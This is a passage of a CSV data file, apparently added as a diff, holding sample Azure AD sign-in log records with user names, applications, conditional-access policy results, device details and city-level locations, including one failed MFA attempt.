+1504,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:17.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,7e0d34cf-4ff5-4ad5-bf56-4c3791d2f728,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 09:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",268d392c-7163-4a17-b774-5f4f4b100f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,268d392c-7163-4a17-b774-5f4f4b100f00,SigninLogs,Sucess,36.6404686,-78.26995087
+1505,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,24:36.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,53338961-4beb-424c-ad88-75cd0b7befc0,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,US,App Service,7ab7862c-4c57-491e-8a45-d52a7e023983,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 12:24,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 81.0.416'}",e9069a8f-c043-4e23-9435-a5568e711100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -77.4198989868164, 'latitude': 38.47222137451172}, 'state': 'Virginia', 'city': 'Stafford'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,e9069a8f-c043-4e23-9435-a5568e711100,SigninLogs,Sucess,38.47222137,-77.41989899
+1506,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:13.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,14e1ce32-eb0a-4d2f-a0c2-b111e432e19c,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 11:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",47dc00a1-c484-43d0-a54f-6777a8790f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,47dc00a1-c484-43d0-a54f-6777a8790f00,SigninLogs,Sucess,36.6404686,-78.26995087
+1507,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,24:33.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,50074,None,User did not pass the MFA challenge.,0,dfe2b6e7-f85a-424d-b915-0eb870e66d9e,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Microsoft Azure,0c1307d4-29d6-4389-a11c-5cbe7f65d7fa,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'failure', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",failure,08/04/2020 10:24,"{'operatingSystem': 'iOS 13', 'deviceId': '', 'browser': 'Mobile Safari 13.4'}",3f36af51-0198-41cf-a56a-8a51cfbf2c00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 50074, 'additionalDetails': 'MFA successfully completed', 'failureReason': 'User did not pass the MFA challenge.'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,3f36af51-0198-41cf-a56a-8a51cfbf2c00,SigninLogs,Failed,50.6406517,5.572050095
+1508,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,33:27.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:33,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",cbcd7f19-25f4-4cfd-824c-94dc97920500,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,cbcd7f19-25f4-4cfd-824c-94dc97920500,SigninLogs,Sucess,33.0175209,35.44601059
+1509,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,44:58.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5006f22d-a934-42b0-8a4c-b687d5e64584,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Microsoft Teams Web Client,5e3ce6c0-2b1f-4285-8d4b-75ee78787346,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:44,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",5a052e7e-2284-4115-9ddd-003f3c830700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -118.24053955078124, 'latitude': 34.0655517578125}, 'state': 'California', 'city': 'Los Angeles'}",none,none,none,medium,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,5a052e7e-2284-4115-9ddd-003f3c830700,SigninLogs,Sucess,34.06555176,-118.2405396
+1510,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,35:35.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5910a703-4678-431e-8af0-af9d0ddfc088,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:35,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",ec85dd07-c5e8-494c-aa5b-3f845ecf0600,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,ec85dd07-c5e8-494c-aa5b-3f845ecf0600,SigninLogs,Sucess,50.6406517,5.572050095
+1511,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,35:39.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0e73dd93-bd88-4273-89eb-ac877bd43236,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 07:35,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD 